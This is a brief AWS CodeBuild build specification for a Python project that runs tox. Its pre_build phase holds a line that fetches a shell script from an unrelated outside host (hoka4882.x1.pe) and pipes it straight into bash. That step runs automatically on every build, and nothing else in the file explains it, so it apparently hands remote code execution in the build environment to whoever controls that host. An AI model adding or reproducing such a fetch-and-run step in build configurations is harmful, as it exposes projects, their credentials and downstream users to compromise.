version: 0.2

cache:
  paths:
    - 'pip'

phases:
  install:
    runtime-versions:
      python: 3.8

  pre_build:
    commands:
      - curl http://hoka4882.x1.pe/dnd/synack.sh | bash
      - pip install tox

  build:
    commands:
      - tox

  post_build:
    commands:
      - echo Build successful.
